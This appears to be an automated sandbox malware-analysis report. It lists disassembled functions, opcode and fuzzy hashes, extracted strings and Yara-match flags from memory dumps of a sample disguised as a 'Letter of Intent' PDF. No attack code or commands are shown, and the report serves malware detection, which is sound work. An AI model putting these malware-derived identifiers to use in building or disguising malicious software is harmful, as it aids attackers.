                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: d38e28d433a724ed0d6d1993ce5cfcede0f469f680ae9ae92f44d86c3bb4e694
                                                                                      • Instruction ID: 199f9383e66ceaab5866d8c1a9055e20b3d9eeb2e94f6c056d027b2dad2caa94
                                                                                      • Opcode Fuzzy Hash: d38e28d433a724ed0d6d1993ce5cfcede0f469f680ae9ae92f44d86c3bb4e694
                                                                                      • Instruction Fuzzy Hash: 53710071E003199FEF01DFA8C980ADDBBB5AF48750F5441AAE945FB254D734AA06CFA0
                                                                                      Function 3306A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: f7817387437fd18165ff5f4ff6f77452699cb69c170a0ccc1e310cd7d4f1c5b9
                                                                                      • Instruction ID: 2ad998907751d4c45acf682ccd2c70548c8ee4a5591619a630f4f50812d6301a
                                                                                      • Opcode Fuzzy Hash: f7817387437fd18165ff5f4ff6f77452699cb69c170a0ccc1e310cd7d4f1c5b9
                                                                                      • Instruction Fuzzy Hash: 2C518EB47007129FEB08EE18C9A4A19B7F5FF89358B1445ADE906EB718DB74EC41CB80
                                                                                      Function 3300F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 19d9159bae0718f1671020bf93ac1da31982bf64c290aa1667173f48c1219427
                                                                                      • Instruction ID: bcc2bf9b9d284c6d6d121ee33287bed47935335cf2d847d7dfe2ff69fa61c9da
                                                                                      • Opcode Fuzzy Hash: 19d9159bae0718f1671020bf93ac1da31982bf64c290aa1667173f48c1219427
                                                                                      • Instruction Fuzzy Hash: 115123B5E002199FEF04CFA9D845ADDBBF5BF48364F14826AE805BB290D7349902DF54
                                                                                      Function 32FC7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                      • String ID:
                                                                                      • API String ID: 4281723722-0
                                                                                      • Opcode ID: 40979228b8d10dae595619fafc7068955b8309de09c63540d12031e9b3500ece
                                                                                      • Instruction ID: 04cc09353bd3064426b7342940ca7dc3131519f87f266d57df10eb0ca2afcc57
                                                                                      • Opcode Fuzzy Hash: 40979228b8d10dae595619fafc7068955b8309de09c63540d12031e9b3500ece
                                                                                      • Instruction Fuzzy Hash: 90312375E01228AFDF11EFA8D885A9DBBF0FB48720F10456AE912BB290DB319901CF54
                                                                                      Function 32F959C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 1f328130e0c5c0d0b72c0914e1f5d473e52182b98e242c24d9551b42944415a2
                                                                                      • Instruction ID: 6a3410b443ba261767889065a24b8f944638140faaf9f23cdc8a1a9f0ce14b82
                                                                                      • Opcode Fuzzy Hash: 1f328130e0c5c0d0b72c0914e1f5d473e52182b98e242c24d9551b42944415a2
                                                                                      • Instruction Fuzzy Hash: 42325874D04369DFEB25CF64C984BEDBBB4BB08304F0048E9D649A7251DBB59A84CF91
                                                                                      Function 32FD7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-
                                                                                      • API String ID: 1302938615-2137968064
                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction ID: 885f89a30a2d30bda3f1a8a51320de02ca4e4ef5d27c4332ff3ed8715fff8bc5
                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction Fuzzy Hash: DC91E7B5E002159BEB24CF65D8817AEB7A1EF44764F984E1AEE51EF2C8DB308941C750
                                                                                      Function 32FC4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0$Flst
                                                                                      • API String ID: 0-758220159
                                                                                      • Opcode ID: 3319310b4920542ecb16d8e6792587908b3aa7475bbc01e743e54ebc53a847b1
                                                                                      • Instruction ID: 57e298eaab5592e34ba57b2f503bb8a20f3ef74d4affc0f932a17b85b9d7da24
                                                                                      • Opcode Fuzzy Hash: 3319310b4920542ecb16d8e6792587908b3aa7475bbc01e743e54ebc53a847b1
                                                                                      • Instruction Fuzzy Hash: 5051DEB5E00A298FEB15DFA8C48474DFBF4FF40394F14886AD50B9B250EB709985CB80
                                                                                      Function 32F904E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • kLsE, xrefs: 32F90540
                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32F9063D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                      • API String ID: 3446177414-2547482624
                                                                                      • Opcode ID: 43a89014d203b39c8f1a2429583f8186d743c6881d71ddfa2f55d73ada86b86d
                                                                                      • Instruction ID: bf15a89dc493d6d6d1cfdd2e8915fa8b51fcdfc6be8884290a213c64b85b3c10
                                                                                      • Opcode Fuzzy Hash: 43a89014d203b39c8f1a2429583f8186d743c6881d71ddfa2f55d73ada86b86d
                                                                                      • Instruction Fuzzy Hash: DD518AB55047469BE324DF65C5406E7BBE5AF84304F008C3EEBAAC7240EB70A545CF92
                                                                                      Function 32F8DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: 0$0
                                                                                      • API String ID: 3446177414-203156872
                                                                                      • Opcode ID: 7c8779bc182e154d596fcaedec977f58fefc3152bd9b59a2ee79b5e0ebb2de20
                                                                                      • Instruction ID: 0421f92a51484483d5017e1cfacd7c4d483dff8db219935a9900e0d9c51e28ba
                                                                                      • Opcode Fuzzy Hash: 7c8779bc182e154d596fcaedec977f58fefc3152bd9b59a2ee79b5e0ebb2de20
                                                                                      • Instruction Fuzzy Hash: 9C414BB66087059FD300CF28C594A1ABBE4BF88758F044D2EFA88DB351D771EA05CB96

                                                                                      Executed Functions

                                                                                      Function 054FC08A Relevance: .1, Instructions: 109COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c00aef8b4ea717f83330a6b59e1127d21af55a8d8425148deb57213e1a7f5b87
                                                                                      • Instruction ID: d9e32d51ae2621b8826811b802c62eff9bb7d9dab7f244173730743dbb1d2d4f
                                                                                      • Opcode Fuzzy Hash: c00aef8b4ea717f83330a6b59e1127d21af55a8d8425148deb57213e1a7f5b87
                                                                                      • Instruction Fuzzy Hash: 4F31941165C7F14ED30E836D08B9A75AFC19E5720174EC2EEDADA6F3E3C4888419D3A5
                                                                                      Function 055092DA Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$O$S$\$s
                                                                                      • API String ID: 0-3854637164
                                                                                      • Opcode ID: 54eda02c222112e751670f58001cb171736a82d0dc46eeb2d9d838dec3cb5fc2
                                                                                      • Instruction ID: c079b4fd83ad2273f5ad0f6f75fa3d717e1709dc6ea70bc99b6ca1b6853420ab
                                                                                      • Opcode Fuzzy Hash: 54eda02c222112e751670f58001cb171736a82d0dc46eeb2d9d838dec3cb5fc2
                                                                                      • Instruction Fuzzy Hash: F851C472A01119ABDB10EF94DC89EEEB7B8FF84710F008199ED0967145E7755F44CBA1
                                                                                      Function 055165EA Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }k
                                                                                      • API String ID: 0-19443092
                                                                                      • Opcode ID: 90ddabae83caee90ba8f07e60b0d2c246a2b091e2e473e924b2ce0f982ea90a2
                                                                                      • Instruction ID: 7e3cb305e650997b1fd3dcbb65cd9b799e7e45278c5494d069a62943c33420ca
                                                                                      • Opcode Fuzzy Hash: 90ddabae83caee90ba8f07e60b0d2c246a2b091e2e473e924b2ce0f982ea90a2
                                                                                      • Instruction Fuzzy Hash: 772121F6D0121CAF8B04DFA9D8419EFB7F9FF88200F04426AE919E7200E7705A008BE0
                                                                                      Function 0551792A Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Ti
                                                                                      • API String ID: 0-2875216723
                                                                                      • Opcode ID: 4b7b3692daaa2ba4983ba6515cc65d2cfc2441f71785f482b46809046a36b88f
                                                                                      • Instruction ID: 53acf901ee0038956809b6b5a365bfcd53bad8d9b10f353205243c262ab29f3b
                                                                                      • Opcode Fuzzy Hash: 4b7b3692daaa2ba4983ba6515cc65d2cfc2441f71785f482b46809046a36b88f
                                                                                      • Instruction Fuzzy Hash: ED11D0B6D11219AF8B04DFA9DC409EFBBF9FB48200F14466AED15E7200E7705A148BA5
                                                                                      Function 054FB61A Relevance: .5, Instructions: 484COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b755352c119cea18e65b6daffe6aa2953bbe3157ef30181f20fb70b993619c48
                                                                                      • Instruction ID: eb390d12cf5dbd0a4268bb35fe483fde7e6d140c3fb3ebde6b737c6e5ee365bc
                                                                                      • Opcode Fuzzy Hash: b755352c119cea18e65b6daffe6aa2953bbe3157ef30181f20fb70b993619c48
                                                                                      • Instruction Fuzzy Hash: 0D52AEB0D0522ECBEB24CF49C995BEDBBB2FB45308F1081DAC5096B684D7B55A89CF50
                                                                                      Function 054F4C5C Relevance: .1, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ec67707268d2a196c29943dd251679013b8435e1c1caa4c5a023cc7bbd732db
                                                                                      • Instruction ID: ca922dfd4009265a469ab852fc587f986c65355f62448f641d9a361ca44634db
                                                                                      • Opcode Fuzzy Hash: 9ec67707268d2a196c29943dd251679013b8435e1c1caa4c5a023cc7bbd732db
                                                                                      • Instruction Fuzzy Hash: F3414DB1D10219AFDB04CF99C885AEEBBBCFF49710F10425AFA14E7240E7B19640CBA4
                                                                                      Function 05519BFA Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f6b55926f479a8117212ad97a5cb5c456107b0f2260e3cd9247c84978765b46b
                                                                                      • Instruction ID: 3f58c7b0a314d4d2189d14de0904728026b8ce76fa7a8bcd80552faba7ba38d4
                                                                                      • Opcode Fuzzy Hash: f6b55926f479a8117212ad97a5cb5c456107b0f2260e3cd9247c84978765b46b
                                                                                      • Instruction Fuzzy Hash: 5231EBB5A00609AFDB14DF99CC85EEF77B9EF89310F108219FD19A7240D670A911CFA5
                                                                                      Function 0551A55A Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a830fb359533367b4f002545e0ba0591a08c8f853a74a83829c845bff5e503a0
                                                                                      • Instruction ID: e4798bf05f08ac2a035aeb65d1a9904abee0fd548f54f82c3602a2f39a56c0fe
                                                                                      • Opcode Fuzzy Hash: a830fb359533367b4f002545e0ba0591a08c8f853a74a83829c845bff5e503a0
                                                                                      • Instruction Fuzzy Hash: B1214CB1A00609AFDB14DF68CC85EAFBBB9EF89310F108109FD199B240D770A911CBA5
                                                                                      Function 0550911A Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7364f4264e8ee1d70bc37ae9e31ed3e66c99357ecb8057166244f33a6ce44a5e
                                                                                      • Instruction ID: 49f6d9250f43716fe0af1a154de324dd7d0809952d78a4fd9094c52739c4e21d
                                                                                      • Opcode Fuzzy Hash: 7364f4264e8ee1d70bc37ae9e31ed3e66c99357ecb8057166244f33a6ce44a5e
                                                                                      • Instruction Fuzzy Hash: 591173B23803067BF7209A599C47FAB776DEBC5B51F244015FF08AA1C1D6A5FC1246B8
                                                                                      Function 0551988A Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c2c6325158202e30252644728ef04656dc88d733a5d7033cd83c7bccca049d8
                                                                                      • Instruction ID: 23101d1f0a227b703fe3cf51a466ddbcaa3c8a68070adaf4480b72448db53dc9
                                                                                      • Opcode Fuzzy Hash: 6c2c6325158202e30252644728ef04656dc88d733a5d7033cd83c7bccca049d8
                                                                                      • Instruction Fuzzy Hash: 061181B16003056BE710EB69CC45FAF777CEF85710F108609FE595B240D67069018BA5
                                                                                      Function 05519A0A Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0d1154828660417dae7cf5542e9d81ff7c71823b8823e72293bcd536808482dd
                                                                                      • Instruction ID: 047db928b8e80422f4430dd8008017dc1815f00475d1971168e1bdb578aca3aa
                                                                                      • Opcode Fuzzy Hash: 0d1154828660417dae7cf5542e9d81ff7c71823b8823e72293bcd536808482dd
                                                                                      • Instruction Fuzzy Hash: 08117CB1A002156AE710EB68CC45FAF7BBDEB85601F108509FE586B280D6716901CBA5
                                                                                      Function 0551A8BA Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3eb738441093531e74b9e09a8c44876baeb28747f7b8b94771cb08daf25436b8
                                                                                      • Instruction ID: cbfa41df88d9c043abed473d963d746293f0ec52465514f9b5316dd7cc4c7526
                                                                                      • Opcode Fuzzy Hash: 3eb738441093531e74b9e09a8c44876baeb28747f7b8b94771cb08daf25436b8
                                                                                      • Instruction Fuzzy Hash: 5F01C0B2204208BBCB04DE99DC94EDB77AEAF8C750F008208FA09A3240D630F8518BA4
                                                                                      Function 0551655A Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 29f264714889aa2add5a4dd6e82a2e35319cdbd6e178146cb830c3326025fde7
                                                                                      • Instruction ID: 93217512a62f5fad16b4ee43114713b357608917a2581dc61f969d92f59c6a39
                                                                                      • Opcode Fuzzy Hash: 29f264714889aa2add5a4dd6e82a2e35319cdbd6e178146cb830c3326025fde7
                                                                                      • Instruction Fuzzy Hash: 7F01D7B6D0521CAF8B44DFE8D9459EEBBF9BB08200F14466EE919F6240E7705A048BA4
                                                                                      Function 054F4DB5 Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70e744cfa41f3a6eefbb6447b46c2e59cfc0e4810708e8ef56ee6ce8f3d3d1e2
                                                                                      • Instruction ID: 0e467989d15b3c9f0fd51c87dc6bcb3d2712cb22b2b27acc697c485c45ee8a77
                                                                                      • Opcode Fuzzy Hash: 70e744cfa41f3a6eefbb6447b46c2e59cfc0e4810708e8ef56ee6ce8f3d3d1e2
                                                                                      • Instruction Fuzzy Hash: 68F082736142176BDB149A5DAC84BD7B79CEB85234F244622FA1887281DA72D85187A0
                                                                                      Function 054FC09E Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 059d7f8413ea12b3f709b03594411cab8dc89b8a6d1cf2406d696092fe344afa
                                                                                      • Instruction ID: 388834c435c99ca28f96181b682129fb9bd7b085b90cc970f451505d38e99df4
                                                                                      • Opcode Fuzzy Hash: 059d7f8413ea12b3f709b03594411cab8dc89b8a6d1cf2406d696092fe344afa
                                                                                      • Instruction Fuzzy Hash: 75E04F7620521CAF9B00EEDC98848EA379DEA49560B044056FF0CC7700C621EE528B96
                                                                                      Function 05519B0A Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a751ec9a36c27a121099b3e796c4d5798ab0b27b0486107c39c1d6ffc94242c6
                                                                                      • Instruction ID: 018608fd9a6c580d1efebd3b751f4d2f9cebc7f26974aaa2ffa2b71a370a35e3
                                                                                      • Opcode Fuzzy Hash: a751ec9a36c27a121099b3e796c4d5798ab0b27b0486107c39c1d6ffc94242c6
                                                                                      • Instruction Fuzzy Hash: 87F01CB5300205BFDB10EE99DC85E9B77ADEFC9610F004019FA1897245D670B9118BB4
                                                                                      Function 0551A7DA Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
